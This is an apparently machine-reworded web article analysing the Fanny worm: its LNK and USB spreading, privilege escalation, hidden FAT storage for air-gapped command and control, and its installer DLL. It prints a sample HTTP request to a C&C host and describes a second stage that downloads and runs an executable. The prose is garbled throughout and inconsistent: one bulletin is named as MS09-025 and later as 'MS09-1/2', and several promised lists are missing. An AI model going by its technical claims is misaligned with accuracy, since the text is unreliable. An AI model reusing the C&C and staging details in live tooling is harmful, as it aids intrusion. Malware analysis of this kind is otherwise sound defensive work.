The C&C server is currently sinkhole via Kaspersky Lab, but in line with our DNS facts it formerly pointed to the subsequent IP address:

Fanny is a pc worm created by using the Equation group in 2008 and distributed at some stage in the Middle East and Asia.

How does a fanny laptop malicious program work?

Fanny malicious program used zero-day exploits, which had been later uncovered at some point of the discovery of Stuxnet. To spread, it used the Stuxnet LNK to take advantage of and USB sticks. For the escalation of privilege, Fanny used a vulnerability patched with the aid of the Microsoft bulletin MS09-025, which from 2009 became also used in one of the early versions of Stuxnet.

The main purpose of Fanny seems to have been the mapping of air-gapped networks. For this, it used a unique USB-primarily based command and control mechanism. When a USB stick is inflamed, Fanny creates a hidden storage vicinity at the stick.

If it infects a computer without an internet connection, it will acquire basic machine facts and store it onto the hidden place of the stick. Later, while a stick containing hidden data is plugged into an internet-connected laptop infected by Fanny, the statistics may be scooped up from the hidden place and dispatched to the C&C.

If the attackers need to run directions on the air-gapped networks, they’ll save these directions within the hidden place of the USB stick. Once the stick is blocked into the air-gapped laptop, Fanny can acknowledge the commands and execute them. This with success allowed the Equation cluster to run commands internal air-gapped networks through the usage of inflamed USB sticks, and furthermore map the infrastructure of such networks.

READ  Bluesnarfing

Several things make Fanny remarkable. First, it used the equal LNK make the most as Stuxnet to spread however used it considering that before Stuxnet. The LNK vulnerability turned into patched by Microsoft in 2010 after Stuxnet changed into discovered, however, Fanny had used it since 2008. The first known variation of Stuxnet dates from 2009. Fanny additionally exploited a second vulnerability in Windows that was a zero-day—unpatched flaw—at the time and was later used by some variations of Stuxnet.

Similarities of Fanny trojan horse with Stuxnet

There are also different similarities between the two malware programs, the Kaspersky researchers said. For example, it seems that both the developers of Stuxnet and Fanny follow sure coding pointers that involve using unique numbers, the researchers said.

The reality that different pc worms used the same zero-day exploits inside the identical manner and at around the same time indicates that their builders are either the identical individuals or working carefully together, the Kaspersky researchers said.

The quality of Fanny doesn’t stop with its use of zero-days. For instance, the malware program creates a hidden storage region on USB drives that area unit formatted with the FAT16 or FAT32 file machine. It will this via exploitation AN undocumented combination of file device flags to form a 1MB box that’s unmarked through the quality FAT drivers used by Windows and completely different operative systems.

Fanny modules

TypeWin32 DLL
Internal namedll_installer.dll
Compiled2008.07.28 08:11:35 (GMT)


This file may be a DLL with 2 exports (to install and uninstall the malware). It contains a xor-encrypted config in binary resource with a variety of one hundred and one. The config determines malware behavior: there’s a command to deploy malware on this system, URLs for the C&C server and native filenames and methods wont to install embedded malware parts.

Fanny laptop worm parts

Upon beginning it exams the following mutexes:



Where is a 1-byte lengthy integer taken from the config? If any of those mutexes exist, the code doesn’t run. It way that another instance of the equal code is running. InstanceNum most probably identifies a variation or era of Fanny preventing the identical model from reinfecting the device however making an allowance for different versions to run (in all likelihood to allow enforced update of components).

The module also examines another important byte in its configuration. This byte is a counter that is decreased all through a successful gadget infection. When the counter reaches a minimal price of 1 the module cleans up the USB drive and prevents spreading the worm. In this way, the attackers limit the maximum length of the Worm’s kill-chain.

If the module is named “fanny.Bmp” (the record name that Fanny uses to spread via USB drives) the module self-installs from the USB drive.

As a part of the initial infection process, Fanny attempts to elevate present-day privileges if the consumer has no administrative rights on the modern-day system. It uses a vulnerability patched by MS09-1/2 for that purpose. Only if the elevation succeeds does the malware attempt to connect to the C&C server the usage of a URL that’s stored in the config:


Below is a sample request issued by using the malware:

GET /ads/QueryRecord200586_f2ahx.Html HTTP/1.1

User-Agent: Mozilla/4.0 (compatible;)

Host: webuysupplystore.Mooo.Com

The malware expects the C&C server to answer with an HTTP two hundred response and append a 0x7f-xored string that has a 2d level URL. The 2d stage reaction may contain an executable file body that is saved on disk and executed.

READ  QualPwn